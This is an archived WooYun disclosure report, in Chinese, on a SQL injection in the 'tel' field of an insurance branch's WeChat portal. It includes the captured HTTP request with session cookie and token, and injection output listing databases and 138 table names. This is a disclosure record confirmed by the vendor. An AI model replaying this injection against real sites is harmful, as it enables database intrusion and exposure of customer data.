乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
坑人的队友
微信端 国寿财险唐山中支
点击微官网抓到一处数据包
POST /weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY HTTP/1.1Host: www.winadd.cnAccept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestAccept-Encoding: gzip, deflateAccept-Language: zh-cnContent-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://www.winadd.cnContent-Length: 94Connection: keep-aliveUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CNReferer: http://www.winadd.cn/weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JYCookie: PHPSESSID=90b06811abbe786a7065f3fe860f90c7wechaname=&tel=13012345678&truename=%E7%8E%8B%E5%B8%85&qq=&sex=1&birthday=2002033&action=index
注入参数是tel大量数据库
available databases [9]:[*] boyacms[*] byhh-weixin[*] byhh-weixinnew[*] byhh_weixin_demo[*] information_schema[*] iwebmall[*] mysql[*] weixin[*] x25gbk
看下当前数据库的表
Database: byhh-weixin[138 tables]+--------------------------+| wx_access || wx_access_token || wx_activity || wx_address || wx_address_danyuan || wx_address_loupan || wx_adma || wx_alipay_config || wx_api || wx_areply || wx_article || wx_autumns_box || wx_autumns_ip || wx_autumns_open || wx_canyin_yaoqing || wx_canyin_yaoqing_cart || wx_case || wx_catemenu || wx_cehua || wx_classify || wx_company || wx_diymen_class || wx_diymen_set || wx_dream || wx_feyin || wx_feyin_record || wx_flash || wx_function || wx_games || wx_games_record || wx_home || wx_hongbao || wx_hongbao_exchange || wx_hongbao_log || wx_hongbao_prize || wx_hongbao_reward || wx_hongbao_zhuli_log || wx_host || wx_host_list_add || wx_host_order || wx_hots || wx_hotspinglun || wx_hotuser || wx_img || wx_indent || wx_jingpai || wx_jingpai_record || wx_jsapi_ticket || wx_kaiyedl || wx_keyword || wx_leitai_expense || wx_lightapp || wx_lightapp_detail || wx_links || wx_liuyan || wx_lottery || wx_lottery_bound || wx_lottery_record || wx_marrycard || wx_marrycard_wish || wx_member || wx_member_card_contact || wx_member_card_coupon || wx_member_card_create || wx_member_card_exchange || wx_member_card_info || wx_member_card_integral || wx_member_card_set || wx_member_card_sign || wx_member_card_vip || wx_membercard || wx_membercard_duihuan || wx_membercard_record || wx_membercard_user || wx_menuplus || wx_nearby_user || wx_node || wx_open_tab || wx_order || wx_ordering_class || wx_ordering_set || wx_other || wx_panorama || wx_photo || wx_photo_list || wx_product || wx_product_cart || wx_product_cart_list || wx_product_cat || wx_product_diningtable || wx_qixi_question || wx_qixi_shop_question || wx_qixi_userinfo || wx_qixi_userinfo_lottery || wx_recognition || wx_recognition_record || wx_red_packet || wx_red_packet_exchange || wx_red_packet_log || wx_red_packet_prize || wx_red_packet_reward || wx_rekeyword || wx_reply_info || wx_requestdata || wx_role || wx_role_user || wx_selfform || wx_selfform_input || wx_selfform_value || wx_site || wx_site_plugmenu || wx_snccode || wx_system_info || wx_table_record || wx_taobao || wx_team || wx_team_tags || wx_text || wx_token_open || wx_token_open_div || wx_user || wx_user_group || wx_user_request || wx_userinfo || wx_users || wx_voiceresponse || wx_weather || wx_wecha_user || wx_wecha_userinfo || wx_wechat_group || wx_wechat_group_list || wx_wifi_relation || wx_wifi_token || wx_world_cup_date || wx_world_cup_lottery || wx_world_cup_name || wx_world_cup_record || wx_wxuser |+--------------------------+
涉及的信息
跑几个看下
过滤或者换个队友
危害等级:中
漏洞Rank:10
确认时间:2015-10-10 08:39
谢谢。
暂无